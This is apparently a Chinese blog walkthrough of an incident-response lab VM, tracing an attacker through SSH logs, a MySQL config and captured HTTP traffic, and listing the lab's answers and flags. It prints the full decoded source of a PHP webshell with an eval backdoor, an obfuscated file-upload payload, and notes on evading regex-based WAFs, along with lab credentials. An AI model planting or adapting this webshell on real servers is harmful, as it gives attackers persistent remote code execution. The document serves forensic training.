应急响应靶机-Linux-web-02
依旧手痒做了Linux1之后感觉受益良多所以又下了个Linux2下面是知攻善防公众号的相关靶机链接https://mp.weixin.qq.com/s/xf2FgkrjZg-yWlB9-pRXvw这一回解压完后发现解压完后的文件是这样的那么靠VMware的扫描虚拟机功能是无法正常导入靶机的点击VMware右上角’文件’→‘打开’→选择.ovf文件→’打开’然后找个地方放靶机文件当然你也可以默认路径就好→点’导入’就行静待片刻靶机导入好后正常打开就行相关账户密码root/Inch957821.呃…不知道为啥手输密码总错…可能是手残吧…不过好在22端口开着的换成ssh连接就好了嘻嘻1、提交攻击者IPgrep “Accepted” /var/log/secure* | awk ‘{print $1,$2,$3,$9,$11}’从 ssh 安全日志里筛选登录成功的记录只打印时间、登录用户、来源 IP可以看到除了我的IP地址192.168.212.135登录外192.168.20.1也登录了那么这个就是攻击者的IP2、提交攻击者修改的管理员密码(明文)netstat -anlupt查看本机所有网络连接、监听端口、对应的进程 PID / 程序名发现mysql服务开着那么就看下数据库的配置文件吧因为说要提交修改的管理员密码嘛那密码一般都存在数据库但不知道数据库的账号密码所以就从配置文件找find / -name config.inc.php数据库常用配置文件名cat /www/wwwroot/127.0.0.1/lib/config.inc.phpmysql账号/密码kaoshi5Sx8mK5ieyLPb84m登录数据库mysql -u kaoshi -p5Sx8mK5ieyLPb84mshow databases;use kaoshi;show tables;select * from x2_user;f6f6eb5ace977d7e114377cc7098b7e3https://www.somd5.com/解密后得到管理员密码Network20203、提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)lshttp.request.method “POST”index.php?user-app-register4、提交Webshell连接密码http.request.method “POST”HEX 解码之后?phperror_reporting(0);session_start();$keye45e329feb5d925b;//该密钥为连接密码32位md5值的前16位默认连接密码rebeyond$_SESSION[k]$key;session_write_close();$postfile_get_contents(php://input);if(!extension_loaded(openssl)){$tbase64_.decode;$post$t($post.);for($i0;$istrlen($post);$i){$post[$i]$post[$i]^$key[$i115];}}else{$postopenssl_decrypt($post,AES128,$key);}$arrexplode(|,$post);$func$arr[0];$params$arr[1];classC{publicfunction__invoke($p){eval($p.);}}call_user_func(newC(),$params);?后面看了几个包发现只要是通过index.php?user‑app‑register路径去执行的操作POST请求包就会有Network2020这个key后面跟要执行的东西也就说webshell的连接密码为Network20205、提交数据包的flag1http.request.method “GET”也可以通过关键字flag 去找flag1{Network_2020_Hack}6、提交攻击者使用的后续上传的木马文件名称http.request.method “POST”这有个妙点你直接复制value值是是没办法解码的需要去掉前两个垃圾字节才解得出来文章后面再细嗦解码后就是第一个webshell的名称和所在路径/www/wwwroot/127.0.0.1/shell.php这里可以明显看到后面就不是路径/index.php?user-app-register访问了而是通过/version2.php 访问那么确定后续上传的木马文件为version2.php补充后续上传的PHP马是直接丢在网站根目录下的访问路径是/version2.php典型web层面的文件持久化后门哪怕漏洞被修复了原shell.php被删除只要version2.php没被发现删除攻击者就还是随时都能访问、控制该服务器。7、提交攻击者隐藏的flag2history看下历史命令看到改了mpnotify.php和alinotify.php最后在alinotify.php看到了flag2flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}/www/wwwroot/127.0.0.1/api8、提交攻击者隐藏的flag3依旧history往下翻点就能看到flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}细嗦部分这个包直接点开来看你只能看到一部分得从HTTP流才能看全红框框起来的才是完整的这里面包含了 URL 编码、十六进制 HEX 编码、Base64 多层混淆,所以你直接放到那些在线解码网站解出来的是乱码下面是分隔好的样子分成三段对应着三种解密方式Network2020ini_set(display_errors,0);set_time_limit(0);$opdirini_get(open_basedir);if($opdir){$ocwddirname($_SERVER[SCRIPT_FILENAME]);$oparrpreg_split(base64_decode(Lzt8Oi8),$opdir);array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparras$item){if(!is_writable($item)){continue;};$tmdir$item./.c81ba5eafdcd;mkdir($tmdir);if(!file_exists($tmdir)){continue;}$tmdirrealpath($tmdir);chdir($tmdir);ini_set(open_basedir,..);$cntarrpreg_split(/\\\\|\//,$tmdir);for($i0;$isizeof($cntarr);$i){chdir(..);};ini_set(open_basedir,/);rmdir($tmdir);break;};};;functionasenc($out){return$out;};functionasoutput(){$outputob_get_contents();ob_end_clean();echo216e1d.ba405f;echoasenc($output);echocfe83.bf68e;}ob_start();try{$fbase64_decode(substr($_POST[x0b6b31b98f31d],2));$c$_POST[fd656d3495adda];$cstr_replace(\r,,$c);$cstr_replace(\n,,$c);$buf;for($i0;$istrlen($c);$i2)$buf.urldecode(%.substr($c,$i,2));echo(fwrite(fopen($f,a),$buf)?1:0);;}catch(Exception$e){echoERROR://.$e-getMessage();};asoutput();die();fd656d3495adda3C3F7068700A406572726F725F7265706F7274696E672830293B0A73657373696F6E5F737461727428293B0A20202020246B65793D2265343565333239666562356439323562223B202F2FE8AFA5E5AF86E992A5E4B8BAE8BF9EE68EA5E5AF86E7A0813332E4BD8D6D6435E580BCE79A84E5898D3136E4BD8DEFBC8CE9BB98E8AEA4E8BF9EE68EA5E5AF86E7A08172656265796F6E640A09245F53455353494F4E5B276B275D3D246B65793B0A0973657373696F6E5F77726974655F636C6F736528293B0A0924706F73743D66696C655F6765745F636F6E74656E747328227068703A2F2F696E70757422293B0A0969662821657874656E73696F6E5F6C6F6164656428276F70656E73736C2729290A097B0A090924743D226261736536345F222E226465636F6465223B0A090924706F73743D24742824706F73742E2222293B0A09090A0909666F722824693D303B24693C7374726C656E2824706F7374293B24692B2B29207B0A202020200909092024706F73745B24695D203D2024706F73745B24695D5E246B65795B24692B312631355D3B200A202020200909097D0A097D0A09656C73650A097B0A090924706F73743D6F70656E73736C5F646563727970742824706F73742C2022414553313238222C20246B6579293B0A097D0A20202020246172723D6578706C6F646528277C272C24706F7374293B0A202020202466756E633D246172725B305D3B0A2020202024706172616D733D246172725B315D3B0A09636C61737320437B7075626C69632066756E6374696F6E205F5F696E766F6B6528247029207B6576616C2824702E2222293B7D7D0A202020204063616C6C5F757365725F66756E63286E6577204328292C24706172616D73293B0A3F3E0Ax0b6b31b98f31dg2L3d3dy93d3dyb290LzEyNy4wLjAuMS9zaGVsbC5waHA第一段 URL解码Network2020ini_set(display_errors,0);set_time_limit(0);$opdirini_get(open_basedir);if($opdir){$ocwddirname($_SERVER[SCRIPT_FILENAME]);$oparrpreg_split(base64_decode(Lzt8Oi8),$opdir);array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparras$item){if(!is_writable($item)){continue;};$tmdir$item./.c81ba5eafdcd;mkdir($tmdir);if(!file_exists($tmdir)){continue;}$tmdirrealpath($tmdir);chdir($tmdir);ini_set(open_basedir,..);$cntarrpreg_split(/\\\\|\//,$tmdir);for($i0;$isizeof($cntarr);$i){chdir(..);};ini_set(open_basedir,/);rmdir($tmdir);break;};};functionasenc($out){return$out;};functionasoutput(){$outputob_get_contents();ob_end_clean();echo216e1d.ba405f;echoasenc($output);echocfe83.bf68e;}ob_start();try{$fbase64_decode(substr($_POST[x0b6b31b98f31d],2));$c$_POST[fd656d3495adda];$cstr_replace(\r,,$c);$cstr_replace(\n,,$c);$buf;for($i0;$istrlen($c);$i2)$buf.urldecode(%.substr($c,$i,2));echo(fwrite(fopen($f,a),$buf)?1:0);}catch(Exception$e){echoERROR://.$e-getMessage();};asoutput();die();第二段 Hex解码?phperror_reporting(0);session_start();$keye45e329feb5d925b;//该密钥为连接密码32位md5值的前16位默认连接密码rebeyond$_SESSION[k]$key;session_write_close();$postfile_get_contents(php://input);if(!extension_loaded(openssl)){$tbase64_.decode;$post$t($post.);for($i0;$istrlen($post);$i){$post[$i]$post[$i]^$key[$i115];}}else{$postopenssl_decrypt($post,AES128,$key);}$arrexplode(|,$post);$func$arr[0];$params$arr[1];classC{publicfunction__invoke($p){eval($p.);}}call_user_func(newC(),$params);?第三段g2L3d3dy93d3dyb290LzEyNy4wLjAuMS9zaGVsbC5waHA先执行把前两个无用字符切掉substr($_POST[x0b6b31b98f31d],2)得到L3d3dy93d3dyb290LzEyNy4wLjAuMS9zaGVsbC5waHA然后Base64 解码/www/wwwroot/127.0.0.1/shell.php这个 WebShell 是典型针对仅做原始报文正则匹配 WAF 的绕过样本当然如果WAF 具备语法解析、污点追踪能力能够模拟代码执行链路追踪用户可控参数经过 substr 截取、base64_decode 解码后流向文件写入函数则该绕过手段将会失效。1提交攻击者IP192.168.20.12提交攻击者修改的管理员密码(明文)Network20203提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)index.php?user-app-register4提交Webshell连接密码Network20205提交数据包的flag1flag1{Network_2020_Hack}6提交攻击者使用的后续上传的木马文件名称version2.php7提交攻击者隐藏的flag2flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}8提交攻击者隐藏的flag3flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}OK大功告成

相关新闻

声卡驱动安装失败怎么办?电脑没声音用软领驱动大师按流程排查恢复

声卡驱动安装失败怎么办?电脑没声音用软领驱动大师按流程排查恢复

文章目录声卡驱动装不上、电脑没声音,先别急着认定声卡坏了先区分声音图标、播放设备和声卡驱动用「软领驱动大师」处理声音异常具体处理步骤一、检查系统兼容性二、使用管理员权限安装三、暂时关闭杀毒软件四、清理旧版驱动五、用驱动管理工具复查驱动状态六、更新…

2026/8/17 4:04:21 阅读更多 →
Element UI el-select filter-method 自定义搜索:多字段、拼音与性能优化实战

Element UI el-select filter-method 自定义搜索:多字段、拼音与性能优化实战

1. 项目概述:当默认搜索不够用在后台管理系统里,下拉选择框(Select)绝对是高频组件。Element UI 的el-select配合filterable属性,开箱即用的远程搜索或者本地过滤,应付大部分场景绰绰有余。但总有那么些“特…

2026/8/18 6:04:25 阅读更多 →
Android事件模拟与注入:从input命令到无障碍服务的自动化实战

Android事件模拟与注入:从input命令到无障碍服务的自动化实战

1. 项目概述:Android事件模拟与注入的深度探索在Android应用开发与测试的日常工作中,我们经常会遇到一些需要自动化操作或模拟用户交互的场景。比如,你想做一个自动化的测试脚本,让它在凌晨三点自动帮你签到领积分;或者…

2026/8/17 4:03:21 阅读更多 →

最新新闻

多智能体强化学习在延迟反馈场景下的三方调度与目标权重自适应实践

多智能体强化学习在延迟反馈场景下的三方调度与目标权重自适应实践

1. 项目概述:从延迟市场反馈中学习,实现三方调度的目标权重自适应最近在折腾一个挺有意思的项目,核心是解决一个在真实商业场景里普遍存在,但学术界讨论相对较少的问题:如何在多智能体强化学习的框架下,处理…

2026/8/18 6:40:14 阅读更多 →
从高镍811到中镍高压:动力电池技术演进与市场选择的深度解析

从高镍811到中镍高压:动力电池技术演进与市场选择的深度解析

1. 从一则旧闻说起:为什么我们今天还要聊“高镍811”?前几天翻看行业旧资料,又看到了2019年那则新闻:“江铃新能源销量大增65%,国轩高科2019年试产高镍811软包电池”。当时这消息在圈内激起过不小的水花,但…

2026/8/18 6:40:14 阅读更多 →
CraftTweaker教程:用ZenScript脚本自定义《我的世界》模组合成表

CraftTweaker教程:用ZenScript脚本自定义《我的世界》模组合成表

1. 项目概述:从“能用”到“会玩”的模组自定义之路如果你玩《我的世界》的模组整合包,尤其是那些大型科技或魔法向的,大概率见过一些奇奇怪怪的合成配方。比如,用四个钻石和一个下界之星合成一个“终极工具核心”,或者…

2026/8/18 6:40:14 阅读更多 →
本地轻量AI绘画实战:Gemini Flash与Nano Banana模型部署与调优指南

本地轻量AI绘画实战:Gemini Flash与Nano Banana模型部署与调优指南

这类组合最值得先看的不是模型参数有多高,而是它能不能在你手头的普通硬件上,稳定、可控地跑出能用的图。很多人一看到“生成艺术图”就兴奋,但实际跑起来,要么显存爆了,要么速度慢到没法用,要么生成的图根…

2026/8/18 6:40:14 阅读更多 →
Excel NETWORKDAYS函数:高效计算工作日天数

Excel NETWORKDAYS函数:高效计算工作日天数

1. NETWORKDAYS函数基础:为什么需要它?在职场办公场景中,我们经常需要计算两个日期之间的工作日天数。比如计算项目周期、统计考勤、核算工资等场景。如果手动计算,不仅效率低下,还容易出错。特别是遇到法定节假日时&a…

2026/8/18 6:40:14 阅读更多 →
流程智能体建模:用工程化方法驾驭AI不确定性,实现可靠业务自动化

流程智能体建模:用工程化方法驾驭AI不确定性,实现可靠业务自动化

1. 项目概述:从“智能体”到“流程智能体”的范式演进最近几年,AI领域最火的概念莫过于“智能体”了。从AutoGPT到各种AI助手,大家似乎都在追求一个能自主思考、独立完成复杂任务的“全能AI”。但实际用下来,很多朋友可能和我有同…

2026/8/18 6:39:13 阅读更多 →

日新闻

告别逐帧截图:用 extract-video-ppt 快速提取视频中的 PPT 并一键导出 PDF

告别逐帧截图:用 extract-video-ppt 快速提取视频中的 PPT 并一键导出 PDF

告别逐帧截图:用 extract-video-ppt 快速提取视频中的 PPT 并一键导出 PDF 【免费下载链接】extract-video-ppt extract the ppt in the video 项目地址: https://gitcode.com/gh_mirrors/ex/extract-video-ppt 如果你还停留在"看网课 不停暂停 截图 …

2026/8/18 0:00:57 阅读更多 →
思源宋体TTF一站式上手:7个字重免费商用,从下载到上线的完整走查

思源宋体TTF一站式上手:7个字重免费商用,从下载到上线的完整走查

思源宋体TTF一站式上手:7个字重免费商用,从下载到上线的完整走查 【免费下载链接】source-han-serif-ttf Source Han Serif TTF 项目地址: https://gitcode.com/gh_mirrors/so/source-han-serif-ttf 你是不是也经历过这种时刻:设计稿里…

2026/8/18 0:00:58 阅读更多 →
华硕笔记本控制权回收指南:GHelper 如何用一个 10MB 文件替代 Armoury Crate

华硕笔记本控制权回收指南:GHelper 如何用一个 10MB 文件替代 Armoury Crate

华硕笔记本控制权回收指南:GHelper 如何用一个 10MB 文件替代 Armoury Crate 【免费下载链接】g-helper Lightweight Armoury Crate alternative for Asus laptops with nearly the same functionality. Works with ROG Zephyrus, Flow, TUF, Strix, Scar, ProArt, …

2026/8/18 0:00:59 阅读更多 →

周新闻

基于阿里云与通义千问(Qwen)构建AI应用:从模型调用到生产部署的完整实践指南

基于阿里云与通义千问(Qwen)构建AI应用:从模型调用到生产部署的完整实践指南

如果你是一名开发者,最近可能已经感受到了AI大模型正在从“玩具”变成“生产力工具”的强烈信号。从代码补全到智能Agent,从本地部署到云端API,我们正处在一个技术栈快速重构的节点。然而,面对层出不穷的模型、框架和工具&#xf…

2026/8/17 2:58:27 阅读更多 →
工业通信系统底层逻辑:04 反射——高频能量撞墙之后会发生什么?

工业通信系统底层逻辑:04 反射——高频能量撞墙之后会发生什么?

第四篇:反射——高频能量撞墙之后会发生什么? —— 你以为信号已经过去了,其实它正在回来打你 老Q的现场笔记 第五季,我们正式进入工业神经系统层。这里不再是单个设备的战斗,而是整个工厂“经脉”层面的秩序之战。从这一篇开始,你将第一次看清:看似简单的信号传播,背…

2026/8/17 2:58:30 阅读更多 →
【文章复现】非线性值迭代自适应动态规划(ADP):离散时间非线性系统的策略迭代自适应动态规划算法研究附Matlab代码

【文章复现】非线性值迭代自适应动态规划(ADP):离散时间非线性系统的策略迭代自适应动态规划算法研究附Matlab代码

✅作者简介:热爱科研的Matlab仿真开发者,擅长毕业设计辅导、数学建模、数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。🍎 往期回顾关注个人主页:Matlab科研工作室👇 关注我领取海量matlab电子书和…

2026/8/17 2:58:32 阅读更多 →

月新闻

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南 【免费下载链接】BaiduNetdiskPlugin-macOS For macOS.百度网盘 破解SVIP、下载速度限制~ 项目地址: https://gitcode.com/gh_mirrors/ba/BaiduNetdiskPlugin-macOS 还在为百度网盘macOS版的龟速下…

2026/8/17 18:54:37 阅读更多 →
终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的NCM格式文件无法在其他播放器播放而烦恼吗?ncmdump解密工具帮你轻松解决这个困…

2026/8/17 18:55:16 阅读更多 →
HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

AgentCard 智能体卡片:为英语学习 App 打造桌面级学习助手适用平台:HarmonyOS 7.0 (API 26 Beta)一、引言 HarmonyOS 7.0(API 26 Beta)新增了 AgentCard 智能体卡片能力,这是继 HMAF(鸿蒙智能体框架&#x…

2026/8/17 18:55:55 阅读更多 →